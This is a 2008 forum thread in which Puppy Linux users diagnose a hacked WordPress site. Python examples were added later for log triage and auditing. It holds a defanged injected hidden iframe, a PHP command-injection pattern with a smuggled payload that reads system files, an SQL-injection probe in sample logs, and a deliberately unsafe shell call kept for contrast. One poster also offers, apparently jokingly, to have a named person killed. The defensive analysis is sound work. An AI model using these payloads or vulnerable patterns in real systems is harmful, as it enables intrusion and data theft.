Page 1 of 9 [121 Posts] |
BarryK (Puppy Master)
Joined: 09 May 2005 Posts: 8826 Location: Perth, Western Australia
Posted: Sat 12 Jan 2008, 18:38 Post subject: Serious security breach on Developer Blog
I went to my blog this morning and got redirected to another site. My PC became very busy, mouse response extremely slow. I managed to kill SeaMonkey.
I FTP'd to my site and found that two files, blog/index.php and blog/wp-blog-header.php have been modified. I have restored the originals.
The big question is, how could someone do that?
I have raised a ticket with servage and asked them that question.
Note, I've turned off comments on my blog, but there were no suspicious comments anyway.
_________________ http://bkhome.org/news/
veronicathecow
Joined: 21 Oct 2006 Posts: 560
Posted: Sat 12 Jan 2008, 18:50
Hi Barry, sorry to hear of this problem. My first thought is "Any chance that your machine has been compromised?" Secondly was, perhaps it's time to see if there is a need to tighten up Puppy security? (It may have been on the server from their side but it looks as though it was making a good stab at taking over your PC.)
Perhaps now that things like the Asus eeePC are getting sold in volume and Firefox is becoming more powerful, the forces of darkness will be taking a deeper interest in open source.
Cheers
Tony
John Doe
Joined: 01 Aug 2005 Posts: 1689 Location: Michigan, US
Posted: Sat 12 Jan 2008, 19:00
I just PM'd this to Barry, before I noticed the thread here.
You're all welcome to read it.
Regarding the page change:
Wordpress 2.3 Cross Domain Content Insertion- New vulnerability + exploit - xssworm.com
http://seclists.org/fulldisclosure/2007/Nov/0336.html
Regarding the one comment that got through the other day, I had signed up to post what follows this link. In the meantime I did some further research and found it was probably SQL injection.
Wordpress 2.3.1 Charset SQL Injection Vulnerability
http://blogsecurity.net/wordpress/wordpress-231-charset-sql-injection-vulnerability/
---
Your security implementation is probably adequate. Three methods which could be used to create such spam came to mind when I read your post.
1- An exploit in the WordPress code to bypass the security layers. If you examine your HTTP logs for the request that created the comment, it might tell you if this was the method used. It would also allow you to notify the WordPress creators so they could fix the problem. You could gather, at a minimum, the page that was used to implement the exploit. If a 'get' post was used, you might be able to further identify the query string, which would help the coders diagnose the problem faster.
2- A server-level database permission issue that allowed another user or site on the same server to insert an entry directly into your database. This would be impractical for spammers, as they would have to pay for accounts on lots of servers and hope a majority of the admins had a weak understanding of security.
3- An SQL injection vulnerability in the registration form, the login form or the search form. The login form and search form queries shouldn't use a user that has insert permissions anyway, so maybe the registration form. This would depend on what permissions to which tables the user account that it queried as was given. If that user doesn't have permission to insert into the comment table in the database, it's not this.
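As an added example (not John Doe's code and not part of WordPress), here is the log triage from point 1 carried out in Python: it parses Apache "combined" access-log lines, pulls out the requests to the comment-posting endpoint within a window around the time the spam comment was recorded, flags query strings that look like SQL-injection probes (point 3), and collects the rest of that client's session so the whole thing can be handed to the developers. The log lines, timestamps, addresses and user agents are constructed for the example; the /blog/wp-comments-post.php path is assumed from the thread's /blog/ prefix.

```python
import re
from datetime import datetime, timedelta, timezone
from urllib.parse import unquote_plus

# Constructed sample access log (Apache "combined" format). Client addresses,
# timestamps and user agents are made up for this example.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jan/2008:14:02:11 +0800] "GET /blog/ HTTP/1.1" 200 8123 "-" "Mozilla/5.0 (X11; Linux)"
203.0.113.7 - - [10/Jan/2008:14:02:40 +0800] "GET /blog/?s=puppy HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux)"
198.51.100.23 - - [10/Jan/2008:14:05:02 +0800] "POST /blog/wp-comments-post.php HTTP/1.0" 302 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
198.51.100.23 - - [10/Jan/2008:14:05:03 +0800] "GET /blog/?s=%27%20UNION%20SELECT%201-- HTTP/1.0" 200 5120 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
192.0.2.9 - - [10/Jan/2008:16:30:00 +0800] "POST /blog/wp-comments-post.php HTTP/1.1" 302 0 "http://example.net/blog/?p=42" "Mozilla/5.0 (X11; Linux)"
"""

# Constructed: the timestamp WordPress stored for the spam comment (UTC+8, Perth time).
COMMENT_TIME = datetime(2008, 1, 10, 14, 5, tzinfo=timezone(timedelta(hours=8)))
# Assumed endpoint that creates comments in a stock WordPress install under /blog/.
COMMENT_ENDPOINT = "/blog/wp-comments-post.php"

LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Fragments that commonly appear once an SQL-injection probe's query string is URL-decoded.
# These are triage hints, not proof; a human still reads the hits.
SQLI_HINTS = ("union select", "--", "/*", "' or ", "'=", "0x")


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    path, _, query = rec["target"].partition("?")
    rec["path"], rec["query"] = path, unquote_plus(query)
    return rec


def comment_requests(log_text, comment_time, window_minutes=10, endpoint=COMMENT_ENDPOINT):
    """Requests to the comment endpoint within +/- window_minutes of the comment's timestamp."""
    lo = comment_time - timedelta(minutes=window_minutes)
    hi = comment_time + timedelta(minutes=window_minutes)
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["path"] == endpoint and lo <= rec["ts"] <= hi:
            hits.append(rec)
    return hits


def suspicious_queries(log_text):
    """(ip, path, decoded query) for every request whose query string carries an SQLi hint."""
    out = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["query"] and any(h in rec["query"].lower() for h in SQLI_HINTS):
            out.append((rec["ip"], rec["path"], rec["query"]))
    return out


def session_for(log_text, ip):
    """Everything one client did, so the complete exchange can be reported upstream."""
    recs = (parse_line(line) for line in log_text.splitlines())
    return [r for r in recs if r and r["ip"] == ip]


if __name__ == "__main__":
    for hit in comment_requests(SAMPLE_LOG, COMMENT_TIME):
        print("comment POST:", hit["ip"], hit["ts"], hit["ua"])
        for rec in session_for(SAMPLE_LOG, hit["ip"]):
            print("   ", rec["ts"].time(), rec["method"], rec["path"], rec["query"])
    print("SQLi-looking queries:", suspicious_queries(SAMPLE_LOG))
```

Run against a real log, the window should be widened until the candidate request appears; the comment's stored time and the web server's clock are rarely in perfect step, and the search-form probe one second after the POST is the kind of detail that tells the developers which form to look at.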
MU
Joined: 24 Aug 2005 Posts: 13647 Location: Karlsruhe, Germany
Posted: Sat 12 Jan 2008, 21:10
I had a comparable problem not long ago.
Using gFTP I could see that the problem came from a newsletter module of, I think, phpBB.
It seems that a weak point was taken to install a spam-mailer.
You could see it by analyzing how the folders around it got infected by new PHP scripts.
One concrete example:
if you have such code:
$thecommand = $_GET["whatnext"];  // raw query-string value, never validated
system($thecommand);              // handed straight to the shell
So you would call a website like this:
http://xyt.com/index.php?whatnext=ls
Then the string "ls" would be passed to index.php.
It then is executed by "system".
Now the attack would be to pass your own string, like:
http://xyt.com/index.php?whatnext=ls;cd;cd ..;cd ..;cd etc;cat passwords
You might have to replace some chars with HTML-entities like %20 instead of spaces.
This is a very obvious vulnerability; there are more advanced ones, as said by John Doe.
And software IS buggy.
We had the example of a commercial board system where you registered as a new user with restrictions, and then, until you logged in to your account, had access to all boards, even those that are usually only allowed to be viewed by administrators.
Mark
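As an added example (not MU's code, and in Python rather than PHP), the same pattern beside a hardened form. shell_commands shows what /bin/sh actually makes of the injected parameter: one separate command per ';' (or '|', '&&', ...), which is why "ls;cd;...;cat passwords" is not one odd filename but six commands. dispatch is the fix: the parameter selects an entry from a fixed allow-list and the chosen argv runs without any shell, so separators in the value have no meaning. The parameter name whatnext is MU's; the allow-list entries and the sample query strings are constructed.

```python
import shlex
import subprocess
from urllib.parse import parse_qs

# Tokens that end one shell command and start another.
SEPARATORS = {";", "&&", "||", "|", "&"}


def run_unsafe(query_string):
    """MU's pattern transliterated: the raw parameter becomes a shell command line.
    Shown only for contrast; never call this with untrusted input."""
    cmd = parse_qs(query_string).get("whatnext", [""])[0]
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def shell_commands(param):
    """Split the parameter the way /bin/sh would: a list of argv lists, one per command."""
    lexer = shlex.shlex(param, punctuation_chars=True)  # ';', '|', '&' become tokens
    commands, current = [], []
    for tok in lexer:
        if tok in SEPARATORS:
            if current:
                commands.append(current)
            current = []
        else:
            current.append(tok)
    if current:
        commands.append(current)
    return commands


# Constructed allow-list: the only things the "whatnext" parameter may select.
ALLOWED = {
    "ping": ["echo", "pong"],
    "list": ["ls", "-1", "."],
}


def planned_argv(query_string):
    """Return the fixed argv for the requested action, or None if it is not allowed."""
    value = parse_qs(query_string).get("whatnext", [""])[0]
    return ALLOWED.get(value)


def dispatch(query_string):
    """Hardened form: allow-listed argv, no shell, so the value cannot smuggle extra commands."""
    argv = planned_argv(query_string)
    if argv is None:
        raise ValueError("whatnext value not in allow-list")
    return subprocess.run(argv, capture_output=True, text=True, check=True).stdout


if __name__ == "__main__":
    injected = "ls;cd;cd ..;cd ..;cd etc;cat passwords"
    print("the shell would run:", shell_commands(injected))
    print("dispatch(ping) ->", dispatch("whatnext=ping").strip())
    print("dispatch(injected) ->", planned_argv("whatnext=" + injected))
```

Escaping metacharacters (PHP's escapeshellarg, or quoting in Python) is the weaker fix: it keeps the shell in the loop and every new metacharacter is a new bug. Mapping the parameter onto a fixed argv list and calling the program directly removes the shell entirely.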
BarryK (Puppy Master)
Joined: 09 May 2005 Posts: 8826 Location: Perth, Western Australia
Posted: Sat 12 Jan 2008, 22:28
Looking around my site with gFTP, I quickly discovered that my entire site had been hacked.
This covers goosee.com as well as puppylinux.com, each in its own subdirectory.
I contacted servage, they replied that I should change my password, and make sure that all directories are 755, and all files 644.
So, I went through, making sure all permissions are okay, uploading the original files when I found a hacked one. But, the thing is, static html pages in 755 directory with 644 permission were also hacked.
I did have a lot of html files with 755, and I did notice a preference by the hacker to hack those. But it doesn't explain how 644 files got hacked. I've sent a message to servage asking how that could happen.
Right now, I'm nervously watching my site to see if anything more happens to it.
There seem to be two different types of hack, one that occurred on Jan 10th, which has injected porno links into some pages. Then the one that I found, a massive hack of my site on Jan 12th, which has inserted redirection code. I'll put the site that I got redirected to, but don't go there!!! Maybe someone can work out what this site does or attempts to do. This is my hacked blog/index.php, but I have inserted some capitalisation to disable it:
Code:
<?php
/* Short and sweet */
define('WP_USE_THEMES', true);
require('./wp-blog-headerDOTphp');
?><iframe src="httpCOLON//orentraffDOTcn/tdsbear/indexDOTphp?out=1199657524" width="0" height="0" style="display:none"></iframe>
_________________ http://bkhome.org/news/
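As an added example (not Barry's code and nothing servage supplied), a Python audit of a web root that does the three checks this post implies: entries that are not 755 (directories) / 644 (files), files modified after a cutoff (so the Jan 10 and Jan 12 waves can be listed by date), and PHP/HTML pages carrying a hidden iframe like the one injected into blog/index.php. build_fixture creates a constructed web root in a temp directory with one clean page, one injected index.php and one mis-permissioned HTML file; example.invalid is a placeholder host.

```python
import os
import re
import stat
import tempfile
import time

# An <iframe> whose tag is also sized 0x0 or styled display:none, as in the injected index.php.
HIDDEN_IFRAME = re.compile(
    r'<iframe\b[^>]*(?:width=["\']?0["\']?|height=["\']?0["\']?|display\s*:\s*none)[^>]*>',
    re.IGNORECASE,
)
# Only these suffixes are scanned for injected markup.
SCAN_SUFFIXES = (".php", ".html", ".htm", ".js")


def permission_issues(root):
    """(relative path, octal mode) for entries that are not 755 (dirs) / 644 (files)."""
    bad = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            mode = stat.S_IMODE(os.lstat(full).st_mode)
            expected = 0o755 if os.path.isdir(full) else 0o644
            if mode != expected:
                bad.append((os.path.relpath(full, root), oct(mode)))
    return sorted(bad)


def modified_since(root, cutoff_epoch):
    """Relative paths of files whose mtime is newer than the cutoff."""
    hits = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            if os.lstat(full).st_mtime > cutoff_epoch:
                hits.append(os.path.relpath(full, root))
    return sorted(hits)


def injected_iframes(root):
    """(relative path, offending tag) for scanned files that contain a hidden iframe."""
    hits = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.lower().endswith(SCAN_SUFFIXES):
                continue
            full = os.path.join(dirpath, name)
            with open(full, "r", encoding="utf-8", errors="replace") as fh:
                m = HIDDEN_IFRAME.search(fh.read())
            if m:
                hits.append((os.path.relpath(full, root), m.group(0)))
    return sorted(hits)


def audit(root, changed_within_days=1):
    """Run all three checks; the mtime cutoff is 'changed_within_days' ago."""
    cutoff = time.time() - changed_within_days * 86400
    return {
        "permissions": permission_issues(root),
        "recently_modified": modified_since(root, cutoff),
        "hidden_iframes": injected_iframes(root),
    }


def build_fixture():
    """Constructed web root: a clean page, an injected PHP file, a 755 HTML file."""
    root = tempfile.mkdtemp(prefix="webroot-")
    os.makedirs(os.path.join(root, "blog"))
    os.chmod(os.path.join(root, "blog"), 0o755)
    old = time.time() - 30 * 86400  # untouched for a month

    def write(rel, text, mode, mtime):
        path = os.path.join(root, rel)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(text)
        os.chmod(path, mode)
        os.utime(path, (mtime, mtime))

    write("index.html", "<html><body>Puppy Linux</body></html>\n", 0o644, old)
    write("blog/index.php",
          "<?php\ndefine('WP_USE_THEMES', true);\nrequire('./wp-blog-header.php');\n"
          "?><iframe src=\"http://example.invalid/tds/\" width=\"0\" height=\"0\" "
          "style=\"display:none\"></iframe>\n", 0o644, time.time())
    write("about.html", "<html><body>About</body></html>\n", 0o755, old)
    return root


if __name__ == "__main__":
    for key, items in audit(build_fixture()).items():
        print(key, items)
```

The mtime check is only a first pass: an attacker who can write the file can also reset its timestamp, so the content scan and a comparison against known-good copies (as Barry did by re-uploading originals) are what actually decide whether a page is clean.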
wingruntled
Joined: 20 Feb 2007 Posts: 287 Location: Great Lakes
Posted: Sat 12 Jan 2008, 23:08
Barry
Not to sound like an idiot, but this is old news.
You were hacked last year but never got the message.
http://murga-linux.com/puppy/viewtopic.php?t=23724
John Doe
Joined: 01 Aug 2005 Posts: 1689 Location: Michigan, US
Posted: Sun 13 Jan 2008, 00:29
I got the name of who is responsible already.
Mahmod AbdAllah el Gashmi
He lives in Turkey. Just say the word Barry and I'll have him killed.
He's mentioned on this page:
http://spamtrackers.eu/wiki/index.php?title=Hijacked_host
I'll post how I figured that out in a bit. I have to go get my nightly brew.
Caneri
Joined: 04 Sep 2007 Posts: 1569 Location: Canada
Posted: Sun 13 Jan 2008, 01:11
Well..it looks like puppylinux.ca is also down.
My IP address will not resolve to my domain.
My tech guys are working on this problem but may be until tomorrow before I get an answer.
Sorry all.
Eric
_________________ Be not afraid to grow slowly, only be afraid of standing still.
Chinese Proverb
John Doe
Joined: 01 Aug 2005 Posts: 1689 Location: Michigan, US
Posted: Sun 13 Jan 2008, 01:33
Ok, I used wget to request the url Barry posted without using the query string and got a simple file that looks like a login form (it's attached as index.php.txt).
Then I used wget to request the url with the query string and got the following pertinent information (the whole dialog is attached as wget-response.txt):
HTTP request sent, awaiting response... 302 Found
Location: httpCOLON//88.255.94.114/~usersonli/oren/indexDOTphp [following]
Connecting to 88.255.94.114:80... failed: Bad file descriptor.
Using the ip address I looked up the owner via whois.ripe.net. It's that guy I mentioned above (info in whois.ripe.net.txt).
The most interesting part was "Bad file descriptor", that's why your browser froze up. I'm assuming it's some sort of exploit for IE that installs his rootkit, which is mentioned at the following post:
http://www.bluetack.co.uk/forums/index.php?showtopic=18139&pid=85109&st=0&#entry85109
What a piece of trash.
Attachment: files.tar (8 KB, downloaded 1240 times). Description: Text Files are in the TarBall.
Caneri
Joined: 04 Sep 2007 Posts: 1569 Location: Canada
Posted: Sun 13 Jan 2008, 01:54
I'm not sure if this is related or not.
http://www.internetnews.com/security/article.php/3712071
Eric
_________________ Be not afraid to grow slowly, only be afraid of standing still.
Chinese Proverb
John Doe
Joined: 01 Aug 2005 Posts: 1689 Location: Michigan, US
Posted: Sun 13 Jan 2008, 02:10
Caneri wrote:
> I'm not sure if this is related or not.
it's all related somehow
cool read, thanks for the link (hopefully it wasn't one of them)
BarryK (Puppy Master)
Joined: 09 May 2005 Posts: 8826 Location: Perth, Western Australia
Posted: Sun 13 Jan 2008, 02:51
Okay, if it's an exploit for IE, then it's likely not targeting Linux and wouldn't have compromised my PC...
Anyway, I think I know how my site was violated. Well, not really 'how', just the basic outline.
My site has had two violations, one dated Jan 10, the second on Jan 12. Well, you might have seen my recent blog post "The spam that got through" - that was Jan 10. Then, last night - Jan 12 - there was another one. That's two of them, corresponding with my site violations.
So, my confidence in WordPress has hit rock bottom. Even if I do upgrade, it seems to be a never ending battle. I've turned off comments - and 'flagman' posted a comment immediately after! Globally turning off comments only affects new posts! Yikes, I hunted through the prefs and there's nothing to globally turn off comments!!!
So, I used the "bad words" filter to block everything - how crude.
_________________ http://bkhome.org/news/
Previously known as Guest
Joined: 28 Sep 2005 Posts: 240
Posted: Sun 13 Jan 2008, 04:33
As I've had an ongoing issue with servage & pkagfiles, one of their "fixes" was to move the account to another datacenter & change ALL permissions (directory & file) to 777! Not the brightest bunch it seems.
I've had problems with permissions in the past! 403 errors for no reason.
Also it seems they outsource their tech support to India. I will look further into it & probably relocate pkagfiles to another host.
pkagfiles is currently working, but am watching closely for issues that may arise & will adjust, take offline if needed.
Sorry for any inconveniences.
Ron AKA PkaG.
Lobster (Official Crustacean)
Joined: 04 May 2005 Posts: 15241 Location: Paradox Realm
Posted: Sun 13 Jan 2008, 04:46
I have a Wordpress blog (rarely post to it)
Had to turn off the comments due to corrective medication for penile dysfunction and porn spam
http://tmxxine.com/wordpress/
corrective medication for penile dysfunction = via***
I cannot use the word via*** as John's efforts to fight the mal merchants change the word to "poisonous crap"
Look how hard John and Flash work to stop spam
(and it still gets through . . . )
It makes sense for spammers to code bots for popular services
and Wordpress is the top blogging tool.
http://www.honeynet.org/papers/bots/botnet-code.html
We have the word "Puppy" come up with Puppy Linux in Google
Therefore owning that or hijacking it is a commercial decision.
An attack is inconvenient, annoying and also can make one paranoid
(as if it is a personal attack)
It is important to maintain one's psychological perspective
when this sort of situation occurs
(I am occasionally sane enough to recognise that)
So far the solution seems right:
1. Exposing and dealing with the situation
2. Notifying and working with the software and server providers
When the Puppy wiki was attacked with spam bots
rather than change to new software
Raffy hardened the existing software
and even though users have to register
many did and some regular users are making
many useful contributions
Related to spam is the use of gmail to filter
(not ideal but no solution is)
Just remember there is a protective cordon of expertise
around Puppy. How this situation is dealt with is indicative
of a growing maturity. Do we stay in place and fight our corner
or run to a new solution
(with attendant problems)?
Good luck.
_________________ YinYana AI Buddhism
Last edited by Lobster on Tue 05 Feb 2008, 00:45; edited 1 time in total
Previously known as Guest
Joined: 28 Sep 2005 Posts: 240
Posted: Sun 13 Jan 2008, 05:48
Previously known as Guest wrote:
> As I've had an ongoing issue with servage & pkagfiles, one of their "fixes" was to move the account to another datacenter & change ALL permissions (directory & file) to 777! Not the brightest bunch it seems.
> I've had problems with permissions in the past! 403 errors for no reason.
> Also it seems they outsource their tech support to India. I will look further into it & probably relocate pkagfiles to another host.
> pkagfiles is currently working, but am watching closely for issues that may arise & will adjust, take offline if needed.
> Sorry for any inconveniences.
> Ron AKA PkaG.
Interestingly within a few minutes of this post an attack started from:
84.221.65.76 [host-84-221-65-76.cust-adsl.tiscali.it]
80.186.120.215 [a80-186-120-215.elisa-laajakaista.fi]
Maybe I'll start posting fscking IP's involved again! I could write a novel of IP addresses.
Powered by phpBB © 2001, 2005 phpBB Group